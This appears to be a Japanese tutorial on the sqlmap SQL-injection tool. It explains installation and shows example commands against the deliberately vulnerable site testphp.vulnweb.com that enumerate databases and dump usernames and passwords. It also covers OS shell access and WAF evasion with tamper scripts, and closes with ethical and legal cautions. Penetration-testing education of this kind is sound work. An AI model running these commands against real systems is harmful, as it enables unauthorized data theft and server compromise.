sqlmap入門: 自動SQLインジェクションツールの使い方徹底解説 🧐

sqlmapは、SQLインジェクションの脆弱性を自動で検出し、悪用するためのオープンソース・ペネトレーションテストツールです。Pythonで書かれており、様々なOSで動作します。

主な特徴:

• 幅広いDBMSサポート: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDBなど、多数のデータベース管理システム (DBMS) に対応しています。
• 多様なSQLインジェクション技術: Booleanベースブラインド, Timeベースブラインド, Errorベース, UNIONクエリベース, Stackedクエリ (連結クエリ), Out-of-band (帯域外) の6種類の主要なSQLインジェクション技術を完全にサポートしています。
• 強力な検出エンジン: 対象のパラメータを特定し、適切なインジェクション手法を自動で試行します。
• データベース情報の列挙: データベース名、テーブル名、カラム名、ユーザー、権限、パスワードハッシュなどを列挙できます。
• データの抽出: テーブル全体のデータ、特定のカラム、特定の範囲のデータを抽出 (ダンプ) できます。
• OSアクセス: データベースの種類や権限によっては、基盤となるオペレーティングシステムのファイルシステムにアクセスしたり、コマンドを実行したりできます (–os-shell, –os-pwn)。
• WAF/IPS回避: Tamperスクリプトを使用して、Web Application Firewall (WAF) や Intrusion Prevention System (IPS) による検知を回避する機能があります。

このように、sqlmapは単に脆弱性を検出するだけでなく、その脆弱性を利用してデータベースから情報を窃取したり、場合によってはサーバー自体を制御したりするための豊富な機能を備えています。

sqlmapは多くのセキュリティ診断用Linuxディストリビューション (Kali Linux, Parrot OSなど) にはプリインストールされています。ターミナルを開いて `sqlmap -h` と入力し、ヘルプメッセージが表示されれば準備完了です。

もしインストールされていない場合や、最新版を使用したい場合は、公式サイト (http://sqlmap.org/) またはGitHubリポジトリ (https://github.com/sqlmapproject/sqlmap) から入手できます。

GitHubからクローンする場合 (gitとPython 3が必要です):

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
python sqlmap.py -h
        

パッケージマネージャー (aptなど) を使用する場合 (Kali Linuxなど):

sudo apt update && sudo apt install sqlmap
        

sqlmapは定期的にアップデートされています。特に新しい脆弱性や回避テクニックが追加されることがあるため、診断前には最新版に更新することをおすすめします。GitHubからクローンした場合は、`git pull` コマンドで更新できます。

cd sqlmap-dev # sqlmapのディレクトリに移動
git pull
        

aptでインストールした場合は、通常のシステムアップデートで更新されます。

sudo apt update && sudo apt upgrade
        

sqlmapの最も基本的な使い方は、脆弱性が疑われるURLを `-u` オプションで指定することです。

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1"
        

上記の例では、`cat=1` というパラメータを持つURLを対象としています。sqlmapは、この `cat` パラメータにSQLインジェクションの脆弱性がないか自動的にテストを開始します。

テスト中、sqlmapは対話形式でいくつか質問をしてくることがあります。例えば、

• 他のパラメータもテストするか？
• 特定のDBMSに合わせたテストを行うか？
• テストのレベルを上げるか？

多くの場合、デフォルト (大文字で表示される選択肢) を選んでEnterキーを押すか、`Y` (Yes) を入力すれば問題ありません。毎回質問に答えるのが煩わしい場合は、`–batch` オプションを付けると、全ての質問に対してデフォルトの選択肢を自動で選んでくれます。

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --batch
        

POSTリクエストの場合

ログインフォームなど、POSTメソッドでデータを送信するページをテストする場合は、`-u` でURLを指定し、`–data` オプションでPOSTデータを指定します。

sqlmap -u "http://example.com/login.php" --data="username=admin&password=pass"
        

sqlmapは `–data` で指定されたパラメータ (この場合は `username` と `password`) をテスト対象と認識します。

特定のパラメータをテストする

URLに複数のパラメータが含まれている場合や、特定のパラメータのみをテストしたい場合は、`-p` オプションを使用します。

sqlmap -u "http://example.com/search.php?query=test&sort=date&page=1" -p query
        

この例では、`query` パラメータのみをSQLインジェクションのテスト対象とします。

Cookieをテストする

Cookieに含まれる値がSQLインジェクションの対象となる場合もあります。`–cookie` オプションでCookieを指定し、`–level=2` 以上を設定すると、Cookie内のパラメータもテスト対象になります。

sqlmap -u "http://example.com/profile.php" --cookie="sessionid=abc123xyz; role=user" --level=2
        

`–level` オプションについては後述します。

HTTPリクエストファイルから読み込む

Burp SuiteなどのプロキシツールでキャプチャしたHTTPリクエストをファイルに保存し、それをsqlmapに読み込ませることも可能です。これは、複雑なリクエストヘッダやデータを持つ場合に便利です。

まず、Burp Suiteなどでリクエストをキャプチャし、「Save item」などでファイル (例: `request.txt`) に保存します。その後、`-r` オプションでそのファイルを指定します。

sqlmap -r request.txt
        

ファイル内のパラメータをテスト対象としたい場合は、パラメータの値の部分にアスタリスク `*` を付けます。

request.txt の例:

POST /search HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 ...
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Cookie: sessionid=abc123xyz

query=test*&sort=date
        

この場合、`query` パラメータの値 (`test`) の部分に `*` があるため、ここがインジェクションポイントとしてテストされます。

sqlmap -r request.txt -p query
        

または `-p` オプションで明示的に指定することもできます。

sqlmapがSQLインジェクション脆弱性を検出すると、次にデータベースに関する情報を収集 (列挙: Enumeration) する段階に進むことができます。

データベース名の取得

`–dbs` オプションを使用すると、アクセス可能なデータベースの一覧を取得できます。

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs --batch
# 出力例:
# available databases [2]:
# [*] acuart
# [*] information_schema
        

テーブル名の取得

特定のデータベース内のテーブル一覧を取得するには、`-D` オプションでデータベース名を指定し、`–tables` オプションを使用します。

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables --batch
# 出力例:
# Database: acuart
# [8 tables]
# +-----------+
# | artists   |
# | carts     |
# | categ     |
# | featured  |
# | guestbook |
# | pictures  |
# | products  |
# | users     |
# +-----------+
        

カラム名の取得

特定のテーブルのカラム一覧を取得するには、`-D` でデータベース名、`-T` でテーブル名を指定し、`–columns` オプションを使用します。

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users --columns --batch
# 出力例:
# Database: acuart
# Table: users
# [8 columns]
# +----------+-------------+
# | Column   | Type        |
# +----------+-------------+
# | address  | varchar(25)|
# | cart     | varchar(50)|
# | cc       | varchar(50)|
# | email    | varchar(50)|
# | name     | varchar(50)|
# | pass     | varchar(50)|
# | phone    | varchar(20)|
# | uname    | varchar(50)|
# +----------+-------------+
        

データの取得 (ダンプ)

テーブル内のデータを取得 (ダンプ) するには、`-D`, `-T` に加えて `-C` でカラム名を指定 (カンマ区切りで複数指定可) し、`–dump` オプションを使用します。

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users -C uname,pass,email --dump --batch
# 出力例:
# Database: acuart
# Table: users
# [1 entry]
# +-------+----------+---------------+
# | uname | pass     | email         |
# +-------+----------+---------------+
# | test  | testpass | test@test.com |
# +-------+----------+---------------+
        

テーブル全体のデータをダンプしたい場合は `-C` を省略するか、`–dump-all` オプションを使用します (大量のデータが取得される可能性があるので注意が必要です)。

その他の情報収集

他にも様々な情報を取得できます。

• `–current-user`: 現在のデータベースユーザーを取得
• `–current-db`: 現在のデータベース名を取得
• `–is-dba`: 現在のユーザーがDB管理者 (DBA) 権限を持っているか確認
• `–users`: データベースユーザーの一覧を取得
• `–passwords`: データベースユーザーのパスワードハッシュを取得 (権限が必要)
• `–privileges`: データベースユーザーの権限を取得
• `–roles`: データベースユーザーのロールを取得 (権限が必要)
• `–banner`: DBMSのバージョン情報を取得
• `–schema`: 全てのデータベース、テーブル、カラムのスキーマ情報を取得 (時間がかかる場合があります)

全てを一度に取得したい場合は `–all` オプションがありますが、非常に時間がかかり、大量のリクエストを送信するため注意が必要です。

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --current-user --is-dba --batch
        

sqlmapには非常に多くのオプションがありますが、ここでは特に重要でよく使われるものをいくつか解説します。完全なリストは `sqlmap -hh` で確認できます。

sqlmapは基本的な使い方だけでも強力ですが、より複雑な状況に対応するための高度な機能も備えています。

OSインタラクション

前述の `–os-shell` は、成功すればターゲットサーバーのシェルを直接操作できる非常に強力な機能です。これが機能するためには、通常、データベースプロセスが高い権限で実行されており、かつファイルシステムへの書き込み権限が必要です。sqlmapは、UDF (User-Defined Functions) の注入や他のテクニックを試みてシェルアクセスを実現しようとします。

`–os-pwn` オプションは、さらに一歩進んで、Metasploit MeterpreterやVNCセッションなどのアウトオブバンド接続を確立しようと試みます。これも成功条件は厳しいですが、実現すれば完全なリモートコントロールが可能になる場合があります。

ファイルシステムの読み書き (`–file-read`, `–file-write`) も、設定ファイルの閲覧やWebShellの設置などに悪用される可能性があります。

WAF/IPS回避とTamperスクリプト

現代のWebアプリケーションの多くは、SQLインジェクション攻撃を防ぐためにWAF (Web Application Firewall) やIPS (Intrusion Prevention System) を導入しています。これらは、特定のパターンやキーワードを含むリクエストを検知し、ブロックします。

sqlmapは、これらの防御機構を回避するために **Tamperスクリプト** という仕組みを提供しています。Tamperスクリプトは、sqlmapが生成したSQLインジェクションペイロードを、WAF/IPSに検知されにくい形に加工 (難読化) するPythonスクリプトです。

sqlmapには多数の組み込みTamperスクリプトが用意されており、`–tamper` オプションで指定して使用します。

sqlmap -u "http://example.com/search.php?id=1" --tamper=space2comment,randomcase --level=3 --batch
        

この例では、`space2comment` (スペースをコメント `/**/` に置換) と `randomcase` (キーワードの大文字小文字をランダムに変更) の2つのTamperスクリプトを適用しています。

よく使われるTamperスクリプトの例:

• `space2comment.py`: スペースを `/**/` に置換 (MySQL)。
• `space2plus.py`: スペースを `+` に置換。
• `space2randomblank.py`: スペースをランダムな空白文字に置換。
• `randomcase.py`: SQLキーワードの大文字小文字をランダムに変更 (例: `SELECT` -> `SeLeCt`)。
• `charencode.py`: URLエンコードを適用。
• `chardoubleencode.py`: 二重URLエンコードを適用。
• `charunicodeencode.py`: Unicodeエンコードを適用。
• `between.py`: `>` を `NOT BETWEEN 0 AND #` に、`=` を `BETWEEN # AND #` に置換。
• `equaltolike.py`: `=` を `LIKE` 演算子に置換。
• `apostrophemask.py`: シングルクォートをUTF-8全角文字に置換。
• `base64encode.py`: ペイロード全体をBase64エンコード。

どのTamperスクリプトが有効かは、ターゲットのWAFの種類や設定に依存します。`–list-tampers` オプションで利用可能なスクリプトの一覧を確認できます。複数のスクリプトを組み合わせることで、より効果的な回避が可能になる場合がありますが、ペイロードが複雑になりすぎて機能しなくなる可能性もあります。

組み込みスクリプトで回避できない場合は、独自のTamperスクリプトを作成することも可能です。これにはPythonの知識と、ターゲットWAFの挙動分析が必要です。WAFのブロックログを確認しながら、ブロックされる文字列やパターンを回避するようにペイロードを加工するスクリプトを作成します。

Tamperスクリプトの利用は試行錯誤のプロセスであり、根気が必要です。Burp Suiteなどのプロキシツールと連携し、実際にどのようなペイロードが送信され、WAFにブロックされているかを確認しながら調整するのが効果的です。

これまで見てきたように、sqlmapは非常に強力なツールであり、使い方を誤れば深刻な問題を引き起こす可能性があります。sqlmapを使用する際には、以下の点を常に念頭に置く必要があります。

1. 許可の取得: 最も重要な原則は、絶対に許可なく他者のシステムに対してsqlmapを使用してはならないということです。テストを行う前には、必ず対象システムの所有者から書面による明確な許可を得てください。許可の範囲 (テスト対象、期間、許可される手法など) を明確にしておくことも重要です。
2. 目的の明確化: sqlmapは、あくまでセキュリティ脆弱性を発見し、修正することを目的としたペネトレーションテスト (侵入テスト) や脆弱性診断のためのツールです。悪意のある目的 (データの窃取、改ざん、システムの破壊など) で使用することは断じて許されません。
3. 影響の考慮: sqlmapのテスト、特に `–level` や `–risk` の値を高く設定した場合や、`–os-shell`, `–dump` などのオプションを使用した場合、ターゲットシステムに予期せぬ負荷をかけたり、データを変更・破壊したり、サービスを停止させたりする可能性があります。テストを行う際には、その影響を十分に考慮し、必要であれば業務時間外に行う、テスト環境を用意するなど、リスクを最小限に抑えるための措置を講じてください。
4. 法的責任: 許可なくシステムに侵入したり、データを不正に取得したりする行為は、不正アクセス禁止法、電子計算機損壊等業務妨害罪、著作権法、個人情報保護法など、様々な法律に抵触する可能性があります。これらの行為は犯罪であり、厳しい罰則 (罰金や懲役) が科せられる可能性があります。自身の行為が法的に問題ないか、常に確認するようにしてください。

sqlmapは、Webアプリケーションのセキュリティを向上させるために非常に役立つツールですが、その力は「諸刃の剣」です。倫理観と責任感を持ち、常に合法的な範囲内で、細心の注意を払って使用することが求められます。

本記事では、SQLインジェクション自動化ツールであるsqlmapの概要から、基本的な使い方、情報収集、主要なオプション、そして高度なテクニックや倫理的な側面について解説しました。

sqlmapは、ペネトレーションテスターやセキュリティ担当者にとって、SQLインジェクション脆弱性の診断を効率化し、その影響度を評価するための強力な武器となります。しかし、その強力さゆえに、常に倫理と法律を遵守し、責任ある使い方を心がける必要があります。

sqlmapをマスターするためには、実際に手を動かしてみることが不可欠です。Damn Vulnerable Web Application (DVWA) や OWASP Juice Shop、testphp.vulnweb.com など、意図的に脆弱性を持つように作られた学習環境を利用して、様々なオプションやテクニックを試してみることをお勧めします。

また、SQLインジェクションそのものについての理解を深めることも重要です。なぜ脆弱性が生まれるのか、どのような種類のインジェクションがあるのか、どのように防御するのかを知ることで、sqlmapの挙動や結果をより深く理解できるようになります。

sqlmapは進化し続けるツールです。GitHubリポジトリをウォッチしたり、関連するセキュリティニュースを追ったりして、常に最新の情報をキャッチアップするようにしましょう。

この記事が、皆さんのsqlmap学習の一助となれば幸いです。安全で倫理的な方法でスキルを磨き、Webセキュリティの向上に貢献していきましょう！ 💪✨